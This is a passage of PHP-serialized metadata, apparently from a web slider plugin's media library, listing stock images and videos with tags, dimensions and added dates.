Sunset\";s:4:\"tags\";a:4:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}i:2;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}i:3;a:3:{s:2:\"id\";s:2:\"23\";s:6:\"handle\";s:5:\"Night\";s:4:\"name\";s:5:\"Night\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1372\";s:6:\"height\";s:4:\"1920\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:290;a:12:{s:2:\"id\";s:3:\"107\";s:6:\"handle\";s:18:\"concert_people.jpg\";s:4:\"name\";s:14:\"Concert People\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1277\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:291;a:12:{s:2:\"id\";s:3:\"106\";s:6:\"handle\";s:15:\"forest_road.jpg\";s:4:\"name\";s:11:\"Forest Road\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1282\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:292;a:12:{s:2:\"id\";s:3:\"105\";s:6:\"handle\";s:15:\"beach_ocean.jpg\";s:4:\"name\";s:11:\"Beach Ocean\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:2;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:293;a:12:{s:2:\"id\";s:3:\"104\";s:6:\"handle\";s:18:\"mountain_night.jpg\";s:4:\"name\";s:14:\"Mountain Night\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}i:2;a:3:{s:2:\"id\";s:2:\"23\";s:6:\"handle\";s:5:\"Night\";s:4:\"name\";s:5:\"Night\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1277\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:294;a:12:{s:2:\"id\";s:3:\"103\";s:6:\"handle\";s:19:\"ocean_mountains.jpg\";s:4:\"name\";s:15:\"Ocean Mountains\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1282\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:295;a:12:{s:2:\"id\";s:3:\"102\";s:6:\"handle\";s:10:\"forest.jpg\";s:4:\"name\";s:6:\"Forest\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:296;a:12:{s:2:\"id\";s:3:\"101\";s:6:\"handle\";s:16:\"ocean_stones.jpg\";s:4:\"name\";s:12:\"Ocean Stones\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:2;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:297;a:12:{s:2:\"id\";s:3:\"100\";s:6:\"handle\";s:16:\"country_road.jpg\";s:4:\"name\";s:12:\"Country Road\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}i:2;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:298;a:12:{s:2:\"id\";s:2:\"99\";s:6:\"handle\";s:9:\"beach.jpg\";s:4:\"name\";s:5:\"Beach\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:299;a:12:{s:2:\"id\";s:2:\"98\";s:6:\"handle\";s:16:\"city_skyline.jpg\";s:4:\"name\";s:12:\"City Skyline\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:300;a:12:{s:2:\"id\";s:2:\"97\";s:6:\"handle\";s:17:\"night_skyline.jpg\";s:4:\"name\";s:13:\"Night Skyline\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}i:2;a:3:{s:2:\"id\";s:2:\"23\";s:6:\"handle\";s:5:\"Night\";s:4:\"name\";s:5:\"Night\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:301;a:12:{s:2:\"id\";s:2:\"96\";s:6:\"handle\";s:14:\"city_river.jpg\";s:4:\"name\";s:10:\"City River\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:302;a:12:{s:2:\"id\";s:2:\"95\";s:6:\"handle\";s:19:\"mountain_view_3.jpg\";s:4:\"name\";s:15:\"Mountain View 3\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1281\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:303;a:12:{s:2:\"id\";s:2:\"94\";s:6:\"handle\";s:14:\"misty_farm.jpg\";s:4:\"name\";s:10:\"Misty Farm\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:304;a:12:{s:2:\"id\";s:2:\"93\";s:6:\"handle\";s:17:\"mountain_path.jpg\";s:4:\"name\";s:13:\"Mountain Path\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:305;a:12:{s:2:\"id\";s:2:\"92\";s:6:\"handle\";s:19:\"night_skyline_3.jpg\";s:4:\"name\";s:15:\"Night Skyline 3\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:306;a:12:{s:2:\"id\";s:2:\"91\";s:6:\"handle\";s:17:\"mountain_view.jpg\";s:4:\"name\";s:13:\"Mountain View\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1160\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:307;a:12:{s:2:\"id\";s:2:\"90\";s:6:\"handle\";s:19:\"rocky_landscape.jpg\";s:4:\"name\";s:15:\"Rocky Landscape\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:308;a:12:{s:2:\"id\";s:2:\"89\";s:6:\"handle\";s:19:\"mountain_view_4.jpg\";s:4:\"name\";s:15:\"Mountain View 4\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1203\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:309;a:13:{s:2:\"id\";s:3:\"529\";s:6:\"handle\";s:13:\"Fitness-4.jpg\";s:5:\"video\";s:13:\"Fitness-4.mp4\";s:4:\"name\";s:10:\"Fitness 4 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:310;a:13:{s:2:\"id\";s:3:\"528\";s:6:\"handle\";s:13:\"Fitness-3.jpg\";s:5:\"video\";s:13:\"Fitness-3.mp4\";s:4:\"name\";s:10:\"Fitness 3 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:311;a:13:{s:2:\"id\";s:3:\"527\";s:6:\"handle\";s:9:\"Chess.jpg\";s:5:\"video\";s:9:\"Chess.mp4\";s:4:\"name\";s:6:\"Chess \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:312;a:13:{s:2:\"id\";s:3:\"526\";s:6:\"handle\";s:13:\"Fitness-2.jpg\";s:5:\"video\";s:13:\"Fitness-2.mp4\";s:4:\"name\";s:10:\"Fitness 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:313;a:13:{s:2:\"id\";s:3:\"525\";s:6:\"handle\";s:11:\"Fitness.jpg\";s:5:\"video\";s:11:\"Fitness.mp4\";s:4:\"name\";s:8:\"Fitness \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:314;a:13:{s:2:\"id\";s:3:\"524\";s:6:\"handle\";s:9:\"Earth.jpg\";s:5:\"video\";s:9:\"Earth.mp4\";s:4:\"name\";s:6:\"Earth \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:315;a:13:{s:2:\"id\";s:3:\"523\";s:6:\"handle\";s:11:\"Space-2.jpg\";s:5:\"video\";s:11:\"Space-2.mp4\";s:4:\"name\";s:8:\"Space 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1440\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:316;a:13:{s:2:\"id\";s:3:\"522\";s:6:\"handle\";s:13:\"Asteroids.jpg\";s:5:\"video\";s:13:\"Asteroids.mp4\";s:4:\"name\";s:10:\"Asteroids \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:317;a:13:{s:2:\"id\";s:3:\"521\";s:6:\"handle\";s:9:\"Space.jpg\";s:5:\"video\";s:9:\"Space.mp4\";s:4:\"name\";s:6:\"Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:318;a:13:{s:2:\"id\";s:3:\"520\";s:6:\"handle\";s:10:\"People.jpg\";s:5:\"video\";s:10:\"People.mp4\";s:4:\"name\";s:7:\"People \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:319;a:13:{s:2:\"id\";s:3:\"519\";s:6:\"handle\";s:11:\"Walking.jpg\";s:5:\"video\";s:11:\"Walking.mp4\";s:4:\"name\";s:8:\"Walking \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:320;a:13:{s:2:\"id\";s:3:\"518\";s:6:\"handle\";s:19:\"Double-Exposure.jpg\";s:5:\"video\";s:19:\"Double-Exposure.mp4\";s:4:\"name\";s:16:\"Double Exposure \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:321;a:13:{s:2:\"id\";s:3:\"517\";s:6:\"handle\";s:8:\"Girl.jpg\";s:5:\"video\";s:8:\"Girl.mp4\";s:4:\"name\";s:5:\"Girl \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1088\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:322;a:13:{s:2:\"id\";s:3:\"516\";s:6:\"handle\";s:17:\"Bengal-Lights.jpg\";s:5:\"video\";s:17:\"Bengal-Lights.mp4\";s:4:\"name\";s:14:\"Bengal Lights \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:323;a:13:{s:2:\"id\";s:3:\"515\";s:6:\"handle\";s:13:\"Swiping-2.jpg\";s:5:\"video\";s:13:\"Swiping-2.mp4\";s:4:\"name\";s:10:\"Swiping 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:324;a:13:{s:2:\"id\";s:3:\"514\";s:6:\"handle\";s:11:\"Mock-Up.jpg\";s:5:\"video\";s:11:\"Mock-Up.mp4\";s:4:\"name\";s:8:\"Mock Up \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:325;a:13:{s:2:\"id\";s:3:\"513\";s:6:\"handle\";s:13:\"Countdown.jpg\";s:5:\"video\";s:13:\"Countdown.mp4\";s:4:\"name\";s:10:\"Countdown \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:326;a:13:{s:2:\"id\";s:3:\"512\";s:6:\"handle\";s:18:\"Wall-Sketching.jpg\";s:5:\"video\";s:18:\"Wall-Sketching.mp4\";s:4:\"name\";s:15:\"Wall Sketching \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:327;a:13:{s:2:\"id\";s:3:\"511\";s:6:\"handle\";s:26:\"Typing-on-the-keyboard.jpg\";s:5:\"video\";s:26:\"Typing-on-the-keyboard.mp4\";s:4:\"name\";s:23:\"Typing on the keyboard \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:328;a:13:{s:2:\"id\";s:3:\"510\";s:6:\"handle\";s:11:\"Meeting.jpg\";s:5:\"video\";s:11:\"Meeting.mp4\";s:4:\"name\";s:8:\"Meeting \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New 